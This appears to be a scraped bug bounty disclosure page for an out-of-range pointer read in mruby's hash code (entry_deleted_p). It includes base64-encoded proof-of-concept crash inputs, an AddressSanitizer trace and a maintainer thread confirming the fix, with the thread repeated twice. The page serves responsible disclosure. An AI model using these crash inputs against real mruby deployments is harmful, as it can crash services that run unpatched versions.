Use of Out-of-range Pointer Offset in mruby/mruby

Valid

Reported on

Feb 14th 2022

Description

Using out of range pointer occurs in entry_deleted_p().

commit : ad3ce7b41c4375f818d02a24e6a09cbc790048c9

Proof of Concept

$ echo -ne "MC5TJDAsKir9PTAsdjowLHY6MA=="  | base64 -d > poc

# ASAN
$ ./bin/mruby.asan poc
AddressSanitizer:DEADLYSIGNAL
=================================================================
==4096970==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000056af82 bp 0x7ffffffeceb0 sp 0x7ffffffecea0 T0)
==4096970==The signal is caused by a READ memory access.
    #0 0x56af82 in entry_deleted_p /home/alkyne/mruby-debug/src/hash.c:386:10
    #1 0x57aef4 in ea_get_by_key /home/alkyne/mruby-debug/src/hash.c:455:3
    #2 0x57a2db in ar_set /home/alkyne/mruby-debug/src/hash.c:525:16
    #3 0x56f7d6 in h_set /home/alkyne/mruby-debug/src/hash.c:1011:3
    #4 0x56e989 in mrb_hash_set /home/alkyne/mruby-debug/src/hash.c:1244:3
    #5 0x5be2bc in mrb_vm_exec /home/alkyne/mruby-debug/src/vm.c:2771:9
    #6 0x58c1ca in mrb_vm_run /home/alkyne/mruby-debug/src/vm.c:1128:12
    #7 0x586939 in mrb_top_run /home/alkyne/mruby-debug/src/vm.c:3037:12
    #8 0x68dd6b in mrb_load_exec /home/alkyne/mruby-debug/mrbgems/mruby-compiler/core/parse.y:6883:7
    #9 0x68ef4b in mrb_load_detect_file_cxt /home/alkyne/mruby-debug/mrbgems/mruby-compiler/core/parse.y:6926:12
    #10 0x4cd28f in main /home/alkyne/mruby-debug/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357:11
    #11 0x7ffff7a690b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #12 0x41d70d in _start (/home/alkyne/mruby-debug/bin/mruby.asan+0x41d70d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/alkyne/mruby-debug/src/hash.c:386:10 in entry_deleted_p
==4096970==ABORTING

We are processing your report and will contact the mruby team within 24 hours. a year ago

alkyne Choi

commented a year ago

Researcher

If you cannot reproduce, please use the following poc.

$ echo -ne "PzAuU29jgGV0MCQwMDAwMCwqKv09P30sU45kc2R2OjAsKir9LFOOZHNkdjowLCoq/QB0TEw6" | base64 -d > poc

We have contacted a member of the mruby team and are waiting to hear back a year ago

Yukihiro "Matz" Matsumoto validated this vulnerability a year ago

alkyne Choi has been awarded the disclosure bounty

The fix bounty is now up for grabs

Yukihiro "Matz" Matsumoto marked this as fixed in 3.2 with commit ff3a5e a year ago

Yukihiro "Matz" Matsumoto has been awarded the fix bounty

This vulnerability will not receive a CVE

Yukihiro "Matz" Matsumoto Yukihiro

commented a year ago

The fix was incomplete. I will revisit.

alkyne Choi

commented a year ago

Researcher

Okay.

Yukihiro "Matz" Matsumoto Yukihiro

commented a year ago

I revisit the issue, and found that the issue is addressed completely. It was my mistake.

to join this conversation

We are processing your report and will contact the mruby team within 24 hours. a year ago

alkyne Choi

commented a year ago

Researcher

If you cannot reproduce, please use the following poc.

$ echo -ne "PzAuU29jgGV0MCQwMDAwMCwqKv09P30sU45kc2R2OjAsKir9LFOOZHNkdjowLCoq/QB0TEw6" | base64 -d > poc

We have contacted a member of the mruby team and are waiting to hear back a year ago

Yukihiro "Matz" Matsumoto validated this vulnerability a year ago

alkyne Choi has been awarded the disclosure bounty

The fix bounty is now up for grabs

Yukihiro "Matz" Matsumoto marked this as fixed in 3.2 with commit ff3a5e a year ago

Yukihiro "Matz" Matsumoto has been awarded the fix bounty

This vulnerability will not receive a CVE

Yukihiro "Matz" Matsumoto Yukihiro

commented a year ago

The fix was incomplete. I will revisit.

alkyne Choi

commented a year ago

Researcher

Okay.

Yukihiro "Matz" Matsumoto Yukihiro

commented a year ago

I revisit the issue, and found that the issue is addressed completely. It was my mistake.

to join this conversation